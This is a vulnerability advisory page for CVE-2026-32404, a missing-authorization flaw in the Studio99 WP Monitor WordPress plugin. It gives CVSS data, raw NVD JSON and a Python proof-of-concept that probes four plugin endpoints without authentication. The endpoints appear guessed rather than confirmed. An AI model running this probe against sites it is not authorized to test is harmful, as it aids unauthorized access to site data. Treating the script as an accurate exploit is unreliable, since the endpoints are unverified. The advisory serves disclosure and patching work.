Security Vulnerability Report
中文
CVE-2026-32404 CVSS 5.3 MEDIUM

CVE-2026-32404

Published: 2026-03-13 19:54:57
Last Modified: 2026-04-29 10:17:06

Description

Missing Authorization vulnerability in Studio99 Studio99 WP Monitor studio99-wp-monitor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Studio99 WP Monitor: from n/a through <= 1.0.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

studio99-wp-monitor <= 1.0.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-32404 PoC - Studio99 WP Monitor Missing Authorization This PoC demonstrates how an unauthenticated attacker can access protected endpoints due to missing authorization checks. """ import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2026-32404 by attempting to access the plugin's monitoring endpoint without auth. """ # Common endpoints for the studio99-wp-monitor plugin endpoints = [ '/wp-admin/admin-ajax.php?action=get_monitor_data', '/wp-content/plugins/studio99-wp-monitor/api/monitor-data', '/wp-json/studio99-monitor/v1/data', '/wp-admin/admin.php?page=studio99-monitor-data' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester/1.0', 'Accept': 'application/json, text/html' } print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2026-32404 - Missing Authorization\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"[*] Testing endpoint: {endpoint}") try: # Send request without authentication response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if we get unauthorized error or actual data if response.status_code == 200: # If we get 200 without auth, vulnerability likely exists if 'data' in response.text.lower() or 'monitor' in response.text.lower(): print(f"[!] VULNERABLE: Endpoint {endpoint} returned data without auth!") print(f"[+] Response preview: {response.text[:200]}...") return True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: Endpoint requires authentication (HTTP {response.status_code})") else: print(f"[-] Unexpected status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("\n[*] Testing complete. No obvious vulnerability detected on tested endpoints.") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2026-32404-poc.py <target_url>") print("Example: python cve-2026-32404-poc.py http://example.com") sys.exit(1) target = sys.argv[1] vulnerable = check_vulnerability(target) if vulnerable: print("\n[+] Target is VULNERABLE to CVE-2026-32404") print("[+] Recommendation: Update studio99-wp-monitor to latest version") else: print("\n[-] Target may not be vulnerable or endpoint not found")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32404", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:56.687", "lastModified": "2026-04-29T10:17:06.163", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Studio99 Studio99 WP Monitor studio99-wp-monitor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Studio99 WP Monitor: from n/a through <= 1.0.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Studio99 Studio99 WP Monitor studio99-wp-monitor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Studio99 WP Monitor: desde n/a hasta &lt;= 1.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/studio99-wp-monitor/vulnerability/wordpress-studio99-wp-monitor-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}